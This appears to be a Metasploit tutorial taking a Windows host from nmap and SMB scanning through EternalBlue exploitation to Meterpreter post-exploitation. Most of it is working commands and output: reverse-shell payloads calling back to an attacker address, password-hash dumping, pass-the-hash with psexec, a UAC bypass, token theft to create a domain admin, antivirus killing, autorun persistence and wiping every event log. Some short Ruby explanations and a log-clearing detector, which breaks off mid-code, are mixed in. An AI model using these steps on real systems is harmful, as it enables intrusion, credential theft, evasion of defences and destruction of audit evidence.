Metasploit (continued)

Information gathering

1. Domain and DNS information gathering
1) whois lookup

whois <domain|ip>

2) nslookup

nslookup <domain>

2. nmap
1) Stealth SYN scan without host discovery

nmap -sS -Pn ip   # -sS: half-open SYN scan; -Pn: treat the host as up and skip the ping probes

2) TCP idle scan
First find a zombie host whose IP ID sequence is predictable. When Metasploit runs on Windows keep THREADS at 16 or below; on UNIX platforms keep it under 128.

msf > use auxiliary/scanner/ip/ipidseq   # probes each host and classifies its IP ID sequence
msf auxiliary(ipidseq) > show options
msf auxiliary(ipidseq) > set rhosts 192.168.2.0/24
rhosts => 192.168.2.0/24
msf auxiliary(ipidseq) > set threads 60
threads => 60
msf auxiliary(ipidseq) > run

Suppose 192.168.2.5 is reported as "Incremental!", which makes it a usable zombie; scan the target through it (nmap can be run straight from the msf prompt):

msf auxiliary(ipidseq) > nmap -Pn -sI 192.168.2.5 192.168.2.8   # -sI <zombie> <target>
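The logic behind ipidseq and `nmap -sI`, written out as an added example (this is not code from the notes or from Metasploit; the host addresses and IP ID samples are constructed). ipidseq classifies a host by how its IP ID changes between probes; only an "Incremental!" host is a usable zombie. The idle scan then reads the zombie's IP ID, sends the target a SYN spoofed from the zombie, and reads the zombie's IP ID again: +2 means the target answered SYN/ACK (open port, zombie replied with a RST), +1 means the target sent a RST or nothing reached the zombie (closed or filtered).

```ruby
# Added example, not part of the original notes or of Metasploit:
# the IP ID classification behind ipidseq and the port-state inference
# behind "nmap -sI", run over constructed samples.

MAX_STEP = 5  # largest per-packet increment still treated as "incremental"

def swap16(id)
  ((id & 0xff) << 8) | ((id >> 8) & 0xff)
end

# Differences between consecutive IDs, modulo 2^16 so wraparound is handled.
def deltas(ids)
  ids.each_cons(2).map { |a, b| (b - a) & 0xffff }
end

# Classify a sequence of IP IDs the way ipidseq / nmap report them.
def classify_ipid_sequence(ids)
  raise ArgumentError, "need at least 3 samples" if ids.size < 3
  return :all_zeros if ids.all?(&:zero?)
  return :constant if ids.uniq.size == 1
  return :incremental if deltas(ids).all? { |d| d.between?(1, MAX_STEP) }
  # Some stacks emit the counter byte-swapped; test the swapped sequence too.
  swapped = ids.map { |i| swap16(i) }
  return :broken_little_endian_incremental if deltas(swapped).all? { |d| d.between?(1, MAX_STEP) }
  :randomized
end

# Infer the target port state from the zombie's IP ID before and after the spoofed SYN.
def idle_scan_infer(ipid_before, ipid_after)
  case (ipid_after - ipid_before) & 0xffff
  when 2 then :open
  when 1 then :closed_or_filtered
  else :unreliable   # the zombie is talking to someone else; retry or pick another zombie
  end
end

if __FILE__ == $0
  # Constructed IP ID samples, as ipidseq would gather them.
  {
    "192.168.2.5" => [31337, 31338, 31339, 31340, 31341, 31342],  # good zombie
    "192.168.2.6" => [0x0100, 0x0200, 0x0300, 0x0400, 0x0500],   # byte-swapped counter
    "192.168.2.7" => [0, 0, 0, 0, 0],                            # useless (all zeros)
    "192.168.2.9" => [54321, 1, 42000, 7, 9999],                 # randomized, useless
  }.each { |host, ids| puts "#{host}: #{classify_ipid_sequence(ids)}" }

  # Two probes against the target through zombie 192.168.2.5.
  puts "port 80 -> #{idle_scan_infer(31342, 31344)}"   # open
  puts "port 23 -> #{idle_scan_infer(31344, 31345)}"   # closed_or_filtered
end
```

A zombie must also be quiet: any other traffic it handles during the probe inflates the counter and produces the `:unreliable` case, which is why ipidseq is run first and a lightly used host is chosen.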

3) db_nmap inside msf (same syntax as nmap; results are recorded in the database)
4) List Metasploit's own port-scanning modules

msf > search portscan

3. Targeted scans
1) SMB (Server Message Block) version scan

msf > use auxiliary/scanner/smb/smb_version

2) Finding misconfigured MSSQL instances (mssql_ping queries the SQL Server Browser service on UDP 1434)

msf > use auxiliary/scanner/mssql/mssql_ping  
msf auxiliary(mssql_ping) > set rhosts 192.168.2.0/24
rhosts => 192.168.2.0/24
msf auxiliary(mssql_ping) > set threads 255
threads => 255
msf auxiliary(mssql_ping) > run

3) SSH version scan

msf > search ssh_version

4) FTP version scan

msf > use auxiliary/scanner/ftp/ftp_version   
msf auxiliary(ftp_version) > set threads 255
threads => 255
msf auxiliary(ftp_version) > set rhosts 192.168.2.0/24
rhosts => 192.168.2.0/24
msf auxiliary(ftp_version) > run

5) SNMP (Simple Network Management Protocol)

msf > search snmp_login

Vulnerability scanning

1. Nexpose

2. Nessus
3. Scanning for VNC servers with no authentication
Current VNC servers no longer allow an empty password, so this mostly finds old or deliberately misconfigured installs.

msf > use  auxiliary/scanner/vnc/vnc_none_auth

4. Scanning for open X11 servers
Modern systems do not expose X11 on the network by default (the X server only listens on TCP 6000 when started with TCP listening enabled), so open X servers are rare today.

msf > use auxiliary/scanner/x11/open_x11

2. Automated attacks driven by scan results

Automated exploitation with autopwn (not recommended; db_autopwn was removed from the framework in 2011 and survives only as a third-party plugin)

msf > db_connect postgres:toor@127.0.0.1/msf1
msf > db_import /root/nessus.nbe
msf > db_autopwn -e -t -r -x -p   # -e launch exploits, -t list matching modules, -r reverse-connect payloads, -x match on vulnerability references, -p match on open ports

Exploitation

1. Exploitation basics

msfconsole commands

msf > ?
Core Commands
=============

Command Description
------- -----------
? Help menu
advanced Displays advanced options for one or more modules
back Move back from the current context
banner Display an awesome metasploit banner
cd Change the current working directory
color Toggle color
connect Communicate with a host
edit Edit the current module with $VISUAL or $EDITOR
exit Exit the console
get Gets the value of a context-specific variable
getg Gets the value of a global variable
grep Grep the output of another command
help Help menu
info Displays information about one or more modules
irb Drop into irb scripting mode
jobs Displays and manages jobs
kill Kill a job
load Load a framework plugin
loadpath Searches for and loads modules from a path
makerc Save commands entered since start to a file
options Displays global options or for one or more modules
popm Pops the latest module off the stack and makes it active
previous Sets the previously loaded module as the current module
pushm Pushes the active or list of modules onto the module stack
quit Exit the console
reload_all Reloads all modules from all defined module paths
rename_job Rename a job
resource Run the commands stored in a file
route Route traffic through a session
save Saves the active datastores
search Searches module names and descriptions
sessions Dump session listings and display information about sessions
set Sets a context-specific variable to a value
setg Sets a global variable to a value
show Displays modules of a given type, or all modules
sleep Do nothing for the specified number of seconds
spool Write console output into a file as well the screen
threads View and manipulate background threads
unload Unload a framework plugin
unset Unsets one or more context-specific variables
unsetg Unsets one or more global variables
use Selects a module by name
version Show the framework and console library version numbers


Database Backend Commands
=========================

Command Description
------- -----------
creds List all credentials in the database
db_connect Connect to an existing database
db_disconnect Disconnect from the current database instance
db_export Export a file containing the contents of the database
db_import Import a scan result file (filetype will be auto-detected)
db_nmap Executes nmap and records the output automatically
db_rebuild_cache Rebuilds the database-stored module cache
db_status Show the current database status
hosts List all hosts in the database
loot List all loot in the database
notes List all notes in the database
services List all services in the database
vulns List all vulnerabilities in the database
workspace Switch between database workspaces

Available exploit modules

msf > show exploits

Available auxiliary modules

msf > show auxiliary

Available payloads

msf > show payloads

2. Exploiting MS17-010 (EternalBlue)
1) If your Metasploit does not ship the modules, update it (msfupdate or the package manager) or fetch them by hand.
Installing the MS17-010 scanner module

root@kali:~/Desktop# cp smb_ms17_010.rb /usr/share/metasploit-framework/modules/auxiliary/scanner/smb/

Installing the exploit module
Drop the module into the matching directory (on Kali the module tree lives under /usr/share/metasploit-framework/modules/), then run reload_all in msfconsole so it is picked up:

cd /usr/share/metasploit-framework/modules/exploits/windows/smb/

wget https://raw.githubusercontent.com/rapid7/metasploit-framework/master/modules/exploits/windows/smb/ms17_010_eternalblue.rb

2) Vulnerability scan
Targeted nmap scan with the NSE vulnerability script

nmap -n -p445 --script smb-vuln-ms17-010 192.168.1.0/24 --open

Or use the smb_ms17_010 module

use auxiliary/scanner/smb/smb_ms17_010   # load the scanner module
show options                              # list the module's options
set RHOSTS 192.168.1.1-254                # scan targets (scanner modules take RHOSTS, plural)
set THREADS 30                            # number of scan threads
run                                       # run the scan

3) Launch the attack

msf > use exploit/windows/smb/ms17_010_eternalblue   # the MS17-010 EternalBlue exploit module
msf exploit(windows/smb/ms17_010_eternalblue) > show targets   # list the supported targets
msf exploit(windows/smb/ms17_010_eternalblue) > info           # module details
msf exploit(ms17_010_eternalblue) > setg rhost 192.168.2.5     # target address, set globally so later modules inherit it
rhost => 192.168.2.5
msf exploit(ms17_010_eternalblue) > set payload windows/x64/meterpreter/reverse_tcp   # reverse-connect payload; x64 to match the target
payload => windows/x64/meterpreter/reverse_tcp
msf exploit(ms17_010_eternalblue) > set lhost 192.168.2.3      # address the Meterpreter connects back to
lhost => 192.168.2.3
msf exploit(ms17_010_eternalblue) > show options               # review the settings
msf exploit(ms17_010_eternalblue) > exploit                    # run it

Meterpreter

1. Common commands
Basic commands:

background      # send the Meterpreter session to the background
sessions -i n   # interact with session number n
quit            # close the session
shell           # drop to a system command shell on the target
irb             # open a Ruby shell
ps              # list running processes
migrate pid     # migrate the Meterpreter session into the process with this PID
kill pid        # kill a process
getpid          # PID of the process Meterpreter currently runs in
sysinfo         # target system information: hostname, OS, etc.

shutdown        # shut the target down

Screenshot

meterpreter>screenshot

Platform information

meterpreter>sysinfo

Processes and process migration

ps       
migrate pid

Current privileges

meterpreter > getuid 
Server username: NT AUTHORITY\SYSTEM

Working directory on the target and on the local (attacker) side

meterpreter > getwd  
C:\Windows\system32

meterpreter > getlwd
/root

Upload a file to the target and download a file from it

meterpreter > upload /root/1.txt c:\\
[*] uploading : /root/1.txt -> c:\
[*] uploaded : /root/1.txt -> c:\\1.txt

meterpreter > download c:/2.txt /root
[*] Downloading: c:/2.txt -> /root/2.txt
[*] Downloaded 5.00 B of 5.00 B (100.0%): c:/2.txt -> /root/2.txt
[*] download : c:/2.txt -> /root/2.txt

Search for files on the target

meterpreter > search -h 
Usage: search [-d dir] [-r recurse] -f pattern [-f pattern]...
Search for files.

OPTIONS:

-d <opt> The directory/drive to begin searching from. Leave empty to search all drives. (Default: )
-f <opt> A file pattern glob to search for. (e.g. *secret*.doc?)
-h Help Banner.
-r <opt> Recursivly search sub directories. (Default: true)

meterpreter > search -d c:\\ -r false -f *.txt
Found 2 results...
c:\1.txt (2 bytes)
c:\2.txt (5 bytes)

Check whether the target is a virtual machine

meterpreter > run post/windows/gather/checkvm  

[*] Checking if WIN-VONVJ6OMEQ7 is a Virtual Machine .....
[+] This is a VMware Virtual Machine

Enable RDP (port 3389)

meterpreter > run post/windows/manage/enable_rdp

[*] Enabling Remote Desktop
[*] RDP is disabled; enabling it ...
[*] Setting Terminal Services service startup mode
[*] The Terminal Services service is not set to auto, changing it to auto ...
[*] Opening port in local firewall if necessary
[*] For cleanup execute Meterpreter resource file: /root/.msf4/loot/20180430181213_default_192.168.1.187_host.windows.cle_516653.txt
meterpreter > netstat -ano

Connection list
===============

Proto Local address Remote address State User Inode PID/Program name
----- ------------- -------------- ----- ---- ----- ----------------
tcp 0.0.0.0:135 0.0.0.0:* LISTEN 0 0 696/svchost.exe
tcp 0.0.0.0:445 0.0.0.0:* LISTEN 0 0 4/System
tcp 0.0.0.0:3389 0.0.0.0:* LISTEN 0 0 1040/svchost.exe

Forward the remote host's port 3389 to local port 1234

meterpreter > portfwd add -l 1234 -r 192.168.1.187 -p 3389
[*] Local TCP relay created: :1234 <-> 192.168.1.187:3389

Spawn a new process (cmd.exe); -H hidden, -i interactive

meterpreter > execute
Usage: execute -f file [options]

Executes a command on the remote machine.

OPTIONS:

-H Create the process hidden from view.
-a <opt> The arguments to pass to the command.
-c Channelized I/O (required for interaction).
-d <opt> The 'dummy' executable to launch when using -m.
-f <opt> The executable command to run.
-h Help menu.
-i Interact with the process after creating it.
-k Execute process on the meterpreters current desktop
-m Execute from memory.
-s <opt> Execute process in a given session as the session user
-t Execute process with currently impersonated thread token
meterpreter > execute -H -f cmd.exe
Process 1840 created.

2. Dumping password hashes
An LM field of aad3b435b51404eeaad3b435b51404ee is the LM hash of an empty string: it means no LM hash is stored (LM hashing disabled, or the password is longer than 14 characters). Likewise an NT field of 31d6cfe0d16ae931b73c59d7e0c089c0 is the NT hash of an empty string, so the account (Guest below) has a blank password.

meterpreter > use priv
[-] The 'priv' extension has already been loaded.
meterpreter > run post/windows/gather/hashdump

[*] Obtaining the boot key...
[*] Calculating the hboot key using SYSKEY 24a05299b237d9f48c9eff1c6a88a57e...
[*] Obtaining the user list and keys...
[*] Decrypting user keys...
[*] Dumping password hints...

No users with password hints on this system

[*] Dumping password hashes...


Administrator:500:aad3b435b51404eeaad3b435b51404ee:db3dd3018cff8541ab7168f899737020:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::

3. Logging in with the dumped administrator hash (pass-the-hash via psexec)

msf > use exploit/windows/smb/psexec
msf exploit(windows/smb/psexec) > show options

Module options (exploit/windows/smb/psexec):

Name Current Setting Required Description
---- --------------- -------- -----------
RHOST yes The target address
RPORT 445 yes The SMB service port (TCP)
SERVICE_DESCRIPTION no Service description to to be used on target for pretty listing
SERVICE_DISPLAY_NAME no The service display name
SERVICE_NAME no The service name
SHARE ADMIN$ yes The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read/write folder share
SMBDomain . no The Windows domain to use for authentication
SMBPass no The password for the specified username
SMBUser no The username to authenticate as


Exploit target:

Id Name
-- ----
0 Automatic


msf exploit(windows/smb/psexec) > set rhost 192.168.1.187
rhost => 192.168.1.187
msf exploit(windows/smb/psexec) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf exploit(windows/smb/psexec) > set lhost 192.168.1.130
lhost => 192.168.1.130
msf exploit(windows/smb/psexec) > set lport 4333
lport => 4333
msf exploit(windows/smb/psexec) > set SMBPass aad3b435b51404eeaad3b435b51404ee:db3dd3018cff8541ab7168f899737020
SMBPass => aad3b435b51404eeaad3b435b51404ee:db3dd3018cff8541ab7168f899737020
msf exploit(windows/smb/psexec) > set SMBUser Administrator
SMBUser => Administrator
msf exploit(windows/smb/psexec) > exploit
[*] Started reverse TCP handler on 192.168.1.230:1444
[*] 192.168.1.187:445 - Connecting to the server...
[*] 192.168.1.187:445 - Authenticating to 192.168.1.187:445 as user 'Administrator'...
[*] 192.168.1.187:445 - Selecting PowerShell target
[*] 192.168.1.187:445 - Executing the payload...
[+] 192.168.1.187:445 - Service start timed out, OK if running a command or non-service executable...
[*] Sending stage (205891 bytes) to 192.168.1.187
[*] Meterpreter session 1 opened (192.168.1.230:1444 -> 192.168.1.187:49468) at 2018-04-30 18:48:56 -0400

meterpreter >
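What the hashdump lines above mean, and how they become the SMBPass value for psexec, as an added example (not code from the notes or from Metasploit). The NT hash is MD4 over the UTF-16LE password with no salt, so the "empty" constants can be recomputed instead of memorised; MD4 is implemented inline because OpenSSL 3 builds of Ruby hide it behind the legacy provider. The two dump lines are the ones printed above; everything else is constructed for the example.

```ruby
# Added example, not part of the original notes or of Metasploit: parse
# hashdump/pwdump lines, flag blank passwords and stored LM hashes, and
# recompute NT hashes (MD4 of UTF-16LE) to show where the constants come from.

MASK32 = 0xffffffff
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"   # LM hash of "": no LM hash stored
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"   # NT hash of "": blank password

def rotl32(x, n)
  ((x << n) | (x >> (32 - n))) & MASK32
end

# MD4 per RFC 1320, returned as a lowercase hex string.
def md4(message)
  a, b, c, d = 0x67452301, 0xefcdab89, 0x98badcfe, 0x10325476
  bit_len = message.bytesize * 8
  data = message.b + "\x80".b
  data << "\x00".b while data.bytesize % 64 != 56
  data << [bit_len & MASK32, bit_len >> 32].pack("V2")

  f = ->(u, v, w) { (u & v) | (~u & w) }
  g = ->(u, v, w) { (u & v) | (u & w) | (v & w) }
  h = ->(u, v, w) { u ^ v ^ w }
  rounds = [
    [f, 0x00000000, (0..15).to_a, [3, 7, 11, 19]],
    [g, 0x5a827999, [0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15], [3, 5, 9, 13]],
    [h, 0x6ed9eba1, [0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15], [3, 9, 11, 15]],
  ]

  (0...data.bytesize).step(64) do |off|
    x = data.byteslice(off, 64).unpack("V16")
    aa, bb, cc, dd = a, b, c, d
    rounds.each do |fn, k, order, shifts|
      order.each_with_index do |i, step|
        a = rotl32((a + fn.call(b, c, d) + x[i] + k) & MASK32, shifts[step % 4])
        a, b, c, d = d, a, b, c
      end
    end
    a = (a + aa) & MASK32
    b = (b + bb) & MASK32
    c = (c + cc) & MASK32
    d = (d + dd) & MASK32
  end
  [a, b, c, d].pack("V4").unpack1("H*")
end

# NT hash: MD4 over the UTF-16LE encoding of the password, unsalted.
def nt_hash(password)
  md4(password.encode("UTF-16LE").b)
end

# Parse one "user:rid:lm:nt:::" line as printed by hashdump / pwdump.
def parse_pwdump_line(line)
  user, rid, lm, nt = line.strip.split(":")
  unless lm && nt && lm.size == 32 && nt.size == 32
    raise ArgumentError, "not a pwdump line: #{line.inspect}"
  end
  lm = lm.downcase
  nt = nt.downcase
  {
    user: user,
    rid: rid.to_i,
    lm: lm,
    nt: nt,
    lm_stored: lm != EMPTY_LM,       # a real LM hash: <=14 chars, case-folded, trivially crackable
    blank_password: nt == EMPTY_NT,
    smbpass: "#{lm}:#{nt}"           # exactly the value psexec's SMBPass takes for pass-the-hash
  }
end

if __FILE__ == $0
  # The two lines from the hashdump output above.
  dump = <<~DUMP
    Administrator:500:aad3b435b51404eeaad3b435b51404ee:db3dd3018cff8541ab7168f899737020:::
    Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
  DUMP
  dump.each_line do |l|
    r = parse_pwdump_line(l)
    puts "#{r[:user]} (RID #{r[:rid]}): LM stored=#{r[:lm_stored]} blank=#{r[:blank_password]} SMBPass=#{r[:smbpass]}"
  end
  puts "NT('')         = #{nt_hash('')}"          # 31d6cfe0d16ae931b73c59d7e0c089c0
  puts "NT('password') = #{nt_hash('password')}"  # 8846f7eaee8fb117ad06bdd830b7586c
end
```

Because the NT hash is unsalted, the hash itself is the credential: psexec authenticates with `lm:nt` exactly as dumped, which is why a dumped Administrator hash is as good as the password, and why the same local Administrator hash reused across machines lets one host's compromise spread laterally.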

4. Privilege escalation

meterpreter > use priv
[-] The 'priv' extension has already been loaded.
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

bypassuac: when getsystem fails because the session belongs to a local administrator whose token is restricted by UAC, background the session, run a UAC bypass against it, then getsystem again in the new session

meterpreter > background
[*] Backgrounding session 1...
msf exploit(windows/smb/psexec) > use exploit/windows/local/bypassuac
msf exploit(windows/local/bypassuac) > set session 1
session => 1
msf exploit(windows/local/bypassuac) > exploit

5. Token impersonation
1) incognito

meterpreter > use incognito 
Loading extension incognito...Success.
meterpreter > list_tokens -u

Delegation Tokens Available
========================================
NT AUTHORITY\LOCAL SERVICE
NT AUTHORITY\NETWORK SERVICE
NT AUTHORITY\SYSTEM
WIN-VONVJ6OMEQ7\Administrator

Impersonation Tokens Available
========================================
NT AUTHORITY\ANONYMOUS LOGON

2) Use ps to find a process owned by a domain administrator (one is not always present)

meterpreter > ps
meterpreter > steal_token <pid>   # steal the domain admin's token from that process

Use the domain administrator's token to create a user and add it to Domain Admins
Example

meterpreter > impersonate_token SNEAKS.IN\\domainadmin
meterpreter > add_user qy qy -h 192.168.1.5   # -h is the domain controller on which the account is created
meterpreter > add_group_user "Domain Admins" qy -h 192.168.1.5

6. Pivoting through the compromised host

meterpreter > run get_local_subnets   # show the target's local subnets

[!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.
[!] Example: run post/multi/manage/autoroute OPTION=value [...]
Local subnet: 192.168.1.0/255.255.255.0

meterpreter > background
[*] Backgrounding session 1...

msf exploit(windows/local/bypassuac) > route add 192.168.2.0 255.255.255.0 1   # send traffic for the remote subnet through session 1 (post/multi/manage/autoroute does the same)
[*] Route added
msf exploit(windows/local/bypassuac) > route print   # show the active routes

IPv4 Active Routing Table
=========================

Subnet Netmask Gateway
------ ------- -------
192.168.2.0 255.255.255.0 Session 1

7. Recovering the administrator's password (mimikatz)
Note that the Password column below is empty: only machine and service logons were present at the time. On hosts with KB2871997 applied, or with UseLogonCredential set to 0, wdigest keeps no plaintext at all.

meterpreter > load mimikatz
Loading extension mimikatz...Success.
meterpreter > wdigest
[+] Running as SYSTEM
[*] Retrieving wdigest credentials
wdigest credentials
===================

AuthID Package Domain User Password
------ ------- ------ ---- --------
0;996 Negotiate WORKGROUP WIN-VONVJ6OMEQ7$
0;46406 NTLM
0;997 Negotiate NT AUTHORITY LOCAL SERVICE
0;999 NTLM WORKGROUP WIN-VONVJ6OMEQ7$

8. Scripts
1) VNC

meterpreter > run vnc   # push a VNC agent to the target and open a VNC session
[*] Creating a VNC reverse tcp stager: LHOST=192.168.1.230 LPORT=4545
[*] Running payload handler
[*] VNC stager executable 73802 bytes long
[*] Uploaded the VNC agent to C:\Windows\TEMP\jzoEGmzImp.exe (must be deleted manually)
[*] Executing the VNC agent with endpoint 192.168.1.230:4545...

meterpreter > run screen_unlock   # unlock the target's desktop
[!] Meterpreter scripts are deprecated. Try post/windows/escalate/screen_unlock.
[!] Example: run post/windows/escalate/screen_unlock OPTION=value [...]
[*] no working target found

2) Enumerate installed applications

meterpreter > run post/windows/gather/enum_applications

[*] Enumerating applications installed on WIN-VONVJ6OMEQ7

Installed Applications
======================

Name Version
---- -------
2345好压 v5.9
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 9.0.30729.6161
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 9.0.30729.6161
Microsoft Visual C++ 2015 Redistributable (x64) - 14.0.24215 14.0.24215.1
Microsoft Visual C++ 2015 x64 Additional Runtime - 14.0.24215 14.0.24215
Microsoft Visual C++ 2015 x64 Minimum Runtime - 14.0.24215 14.0.24215
Python 2.7.13 (64-bit) 2.7.13150
VMware Tools 10.2.0.7259539


[+] Results stored in: /root/.msf4/loot/20180501054603_default_192.168.1.187_host.application_930049.txt

3) Migrate to a stable process

meterpreter > getpid
Current pid: 1128

meterpreter > run post/windows/manage/migrate
[*] Running module against WIN-VONVJ6OMEQ7
[*] Current server process: spoolsv.exe (1128)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 3592
[+] Successfully migrated to process 3592

meterpreter > getpid
Current pid: 3592

4) Kill antivirus

meterpreter > run killav

[!] Meterpreter scripts are deprecated. Try post/windows/manage/killav.
[!] Example: run post/windows/manage/killav OPTION=value [...]
[*] Killing Antivirus services on the target...

5) Capture the target's network traffic

meterpreter > run packetrecorder -i 1
[!] Meterpreter scripts are deprecated. Try post/windows/manage/rpcapd_start.
[!] Example: run post/windows/manage/rpcapd_start OPTION=value [...]
[*] Starting Packet capture on interface 1
[+] Packet capture started
[*] Packets being saved in to /root/.msf4/logs/scripts/packetrecorder/WIN-VONVJ6OMEQ7_20180501.0138/WIN-VONVJ6OMEQ7_20180501.0138.cap
[*] Packet capture interval is 30 Seconds

6) Dump the system's user hashes

meterpreter > run hashdump

[!] Meterpreter scripts are deprecated. Try post/windows/gather/smart_hashdump.
[!] Example: run post/windows/gather/smart_hashdump OPTION=value [...]
[*] Obtaining the boot key...
[*] Calculating the hboot key using SYSKEY 24a05299b237d9f48c9eff1c6a88a57e...
[*] Obtaining the user list and keys...
[*] Decrypting user keys...
[*] Dumping password hints...

No users with password hints on this system

[*] Dumping password hashes...


Administrator:500:aad3b435b51404eeaad3b435b51404ee:db3dd3018cff8541ab7168f899737020:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::

7) Collect detailed system information
scraper gathers user accounts, the full registry, password hashes and system information

meterpreter > run scraper
[*] New session on 192.168.1.187:445...
[*] Gathering basic system information...
[*] Dumping password hashes...
[*] Obtaining the entire registry...
[*] Exporting HKCU
[*] Downloading HKCU (C:\Windows\TEMP\JKaHEoEs.reg)
[*] Cleaning HKCU
[*] Exporting HKLM
[*] Downloading HKLM (C:\Windows\TEMP\qCMsnidu.reg)
[*] Cleaning HKLM
[*] Exporting HKCC
[*] Downloading HKCC (C:\Windows\TEMP\PTbboPFX.reg)
[*] Cleaning HKCC
[*] Exporting HKCR
[*] Downloading HKCR (C:\Windows\TEMP\AQMWnvZo.reg)
[*] Cleaning HKCR
[*] Exporting HKU
[*] Downloading HKU (C:\Windows\TEMP\XNLnHUgE.reg)
[*] Cleaning HKU
[*] Completed processing on 192.168.1.187:445...

8) Persistence
-X start at boot, -i 40 retry the connection every 40 seconds, -p the listening port, -r the attacker's address the agent connects back to (LHOST). In the capture below the author passed the target's own address, 192.168.1.187, so the agent would call back to itself; -r must be the attacker machine.

meterpreter > run persistence -X -i 40 -p 443 -r 192.168.1.187 

[!] Meterpreter scripts are deprecated. Try post/windows/manage/persistence_exe.
[!] Example: run post/windows/manage/persistence_exe OPTION=value [...]
[*] Running Persistence Script
[*] Resource file for cleanup created at /root/.msf4/logs/persistence/WIN-VONVJ6OMEQ7_20180501.2631/WIN-VONVJ6OMEQ7_20180501.2631.rc
[*] Creating Payload=windows/meterpreter/reverse_tcp LHOST=192.168.1.187 LPORT=443
[*] Persistent agent script is 99671 bytes long
[+] Persistent Script written to C:\Windows\TEMP\ManzZNr.vbs
[*] Executing script C:\Windows\TEMP\ManzZNr.vbs
[+] Agent executed with PID 3852
[*] Installing into autorun as HKLM\Software\Microsoft\Windows\CurrentVersion\Run\KHNDPfTiTa
[+] Installed into autorun as HKLM\Software\Microsoft\Windows\CurrentVersion\Run\KHNDPfTiTa

Catch the callback. The handler has to match what persistence generated: the capture above shows Payload=windows/meterpreter/reverse_tcp (x86) on LHOST=192.168.1.187, so a handler set to windows/x64/meterpreter/reverse_tcp, as below, will never receive the session. Use the same payload name and the attacker's own LHOST.

msf > use multi/handler
msf exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf exploit(multi/handler) > set lhost 192.168.1.187
lhost => 192.168.1.187
msf exploit(multi/handler) > set lport 443
lport => 443
msf exploit(multi/handler) > exploit

9) List all post modules
Type run post/ and press Tab

meterpreter > run post/
Display all 207 possibilities? (y or n)

9. Calling the Windows API with Railgun

meterpreter > irb
[*] Starting IRB shell
[*] The "client" variable holds the meterpreter client
>> client.railgun.user32.MessageBoxA(0,"hello","world","MB_OK")

A message box with caption "world" and text "hello" appears on the target's desktop (MessageBoxA takes hWnd, text, caption, type; the screenshot is not reproduced here).

10. Upgrading a shell to Meterpreter

C:\Windows\system32> # Ctrl+Z backgrounds the session
Background session 1? [y/N] y
msf exploit(windows/smb/ms17_010_eternalblue) > sessions -i

Active sessions
===============

Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 shell x64/windows Microsoft Windows [Version 6.1.7601] (c) 2009 Microsoft Corporation C:\Windows\s... 192.168.1.230:4411 -> 192.168.1.187:54038 (192.168.1.187)

msf exploit(windows/smb/ms17_010_eternalblue) > sessions -u 1   # upgrade session 1 to Meterpreter

11. Covering tracks
This wipes every event log, which is itself loud: clearing the Security log writes event 1102 ("The audit log was cleared") as the first record of the emptied log, and clearing any other log writes event 104 to the System log naming the cleared channel, so a monitored host flags it immediately.

meterpreter > run event_manager
Meterpreter Script for Windows Event Log Query and Clear.

OPTIONS:

-c <opt> Clear a given Event Log (or ALL if no argument specified)
-f <opt> Event ID to filter events on
-h Help menu
-i Show information about Event Logs on the System and their configuration
-l <opt> List a given Event Log.
-p Supress printing filtered logs to screen
-s <opt> Save logs to local CSV file, optionally specify alternate folder in which to save logs

meterpreter > run event_manager -c
[-] You must specify and eventlog to query!
[*] Application:
[*] Clearing Application
[*] Event Log Application Cleared!
[*] HardwareEvents:
[*] Clearing HardwareEvents
[*] Event Log HardwareEvents Cleared!
[*] Internet Explorer:
[*] Clearing Internet Explorer
[*] Event Log Internet Explorer Cleared!
[*] Key Management Service:
[*] Clearing Key Management Service
[*] Event Log Key Management Service Cleared!
[*] Security:
[*] Clearing Security
[*] Event Log Security Cleared!
[*] System:
[*] Clearing System
[*] Event Log System Cleared!
[*] ThinPrint Diagnostics:
[*] Clearing ThinPrint Diagnostics
[*] Event Log ThinPrint Diagnostics Cleared!
[*] Windows PowerShell:
[*] Clearing Windows PowerShell
[*] Event Log Windows PowerShell Cleared!
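The defender's view of the run above, as an added example (not code from the notes or from Metasploit): Windows records log clearing itself, with event 1102 in the Security log and event 104 in the System log naming the cleared channel, and a wipe like `event_manager -c` produces a burst of such records within seconds. The event records below are constructed; the field names follow what a wevtutil export or a SIEM normalisation would give.

```ruby
require "time"

# Added example, not from the original notes or from Metasploit: detect event
# log clearing (Security 1102, System 104) and the burst pattern of a wipe.
# The records are constructed for the example.
SAMPLE_EVENTS = [
  { log: "System",   id: 104,  time: "2018-04-28T09:00:00Z", user: "helpdesk",      channel: "Application" },
  { log: "Security", id: 4624, time: "2018-05-01T01:10:03Z", user: "Administrator" },
  { log: "Security", id: 4672, time: "2018-05-01T01:10:03Z", user: "Administrator" },
  { log: "System",   id: 104,  time: "2018-05-01T01:45:10Z", user: "SYSTEM",        channel: "Application" },
  { log: "Security", id: 1102, time: "2018-05-01T01:45:11Z", user: "SYSTEM" },
  { log: "System",   id: 104,  time: "2018-05-01T01:45:12Z", user: "SYSTEM",        channel: "System" },
  { log: "System",   id: 104,  time: "2018-05-01T01:45:13Z", user: "SYSTEM",        channel: "Windows PowerShell" },
  { log: "System",   id: 7036, time: "2018-05-01T01:50:00Z", user: "SYSTEM" },
].freeze

# 1102 lives in the Security log; 104 lives in the System log and names the
# channel that was cleared (including System itself).
def clear_event?(e)
  (e[:log] == "Security" && e[:id] == 1102) || (e[:log] == "System" && e[:id] == 104)
end

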